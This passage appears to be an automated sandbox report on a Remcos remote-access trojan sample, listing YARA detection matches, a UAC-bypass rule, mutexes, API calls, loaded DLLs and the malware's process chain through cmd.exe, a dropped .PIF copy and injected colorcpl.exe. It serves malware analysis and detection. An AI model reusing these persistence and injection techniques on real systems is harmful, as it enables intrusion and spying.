                Source: SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs SEPTobn3BR.exe
                Source: SEPTobn3BR.exe, 00000000.00000002.1439132054.0000000020A09000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs SEPTobn3BR.exe
                Source: SEPTobn3BR.exe, 00000000.00000002.1439132054.0000000020A09000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs SEPTobn3BR.exe
                Source: SEPTobn3BR.exe, 00000000.00000002.1439132054.0000000020A5A000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs SEPTobn3BR.exe
                Source: SEPTobn3BR.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                Source: 13.2.colorcpl.exe.2c00000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 13.2.colorcpl.exe.2c00000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 13.2.colorcpl.exe.2c00000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                Source: 5.2.colorcpl.exe.3090000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 5.2.colorcpl.exe.3090000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 5.2.colorcpl.exe.3090000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                Source: 10.2.colorcpl.exe.2990000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 10.2.colorcpl.exe.2990000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 10.2.colorcpl.exe.2990000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                Source: 10.2.colorcpl.exe.2990000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 10.2.colorcpl.exe.2990000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 10.2.colorcpl.exe.2990000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                Source: 5.2.colorcpl.exe.3090000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 5.2.colorcpl.exe.3090000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 5.2.colorcpl.exe.3090000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                Source: 13.2.colorcpl.exe.2c00000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 13.2.colorcpl.exe.2c00000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 13.2.colorcpl.exe.2c00000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                Source: 0.2.SEPTobn3BR.exe.2b80000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0.2.SEPTobn3BR.exe.2b80000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                Source: 0000000D.00000002.1606949388.0000000002C00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0000000D.00000002.1606949388.0000000002C00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 0000000D.00000002.1606949388.0000000002C00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                Source: 00000000.00000002.1449264347.000000007E8E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0000000A.00000002.1526920917.0000000002990000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0000000A.00000002.1526920917.0000000002990000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 0000000A.00000002.1526920917.0000000002990000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                Source: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                Source: Process Memory Space: SEPTobn3BR.exe PID: 7648, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: colorcpl.exe PID: 7920, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: colorcpl.exe PID: 3232, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: colorcpl.exe PID: 6756, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Emxwenem.PIF.0.drBinary string: \Device\Floppy0U
                Source: Emxwenem.PIF.0.drBinary string: \Device\Floppy0
                Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@21/8@2/3
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_030A5C90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,5_2_030A5C90
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_029A5C90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,10_2_029A5C90
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: 0_2_02B87F5A GetDiskFreeSpaceA,0_2_02B87F5A
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0309E2E7 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle,5_2_0309E2E7
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: 0_2_02B96D50 CoCreateInstance,0_2_02B96D50
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_030A9493 FindResourceA,LoadResource,LockResource,SizeofResource,5_2_030A9493
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_030A8A00 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,5_2_030A8A00
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeFile created: C:\Users\Public\EmxwenemF.cmdJump to behavior
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7876:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4036:120:WilError_03
                Source: C:\Windows\SysWOW64\colorcpl.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-3W4HX7
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8188:120:WilError_03
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: SEPTobn3BR.exeVirustotal: Detection: 66%
                Source: SEPTobn3BR.exeReversingLabs: Detection: 55%
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeFile read: C:\Users\user\Desktop\SEPTobn3BR.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\SEPTobn3BR.exe "C:\Users\user\Desktop\SEPTobn3BR.exe"
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
                Source: unknownProcess created: C:\Users\Public\Libraries\Emxwenem.PIF "C:\Users\Public\Libraries\Emxwenem.PIF"
                Source: C:\Users\Public\Libraries\Emxwenem.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\Public\Libraries\Emxwenem.PIFProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
                Source: unknownProcess created: C:\Users\Public\Libraries\Emxwenem.PIF "C:\Users\Public\Libraries\Emxwenem.PIF"
                Source: C:\Users\Public\Libraries\Emxwenem.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                Source: C:\Users\Public\Libraries\Emxwenem.PIFProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmdJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exeJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmdJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exeJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmdJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exeJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: olepro32.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: url.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: ieproxy.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: ieproxy.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: ieproxy.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: mssip32.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: mssip32.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: mssip32.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: smartscreenps.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: smartscreenps.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: smartscreenps.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: winhttpcom.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: ??????????.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: ??l.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: ????.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: ???e???????????.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: ???e???????????.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: ??l.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: ??l.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: tquery.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: cryptdll.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: spp.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: vssapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: vsstrace.dllJump to behavior
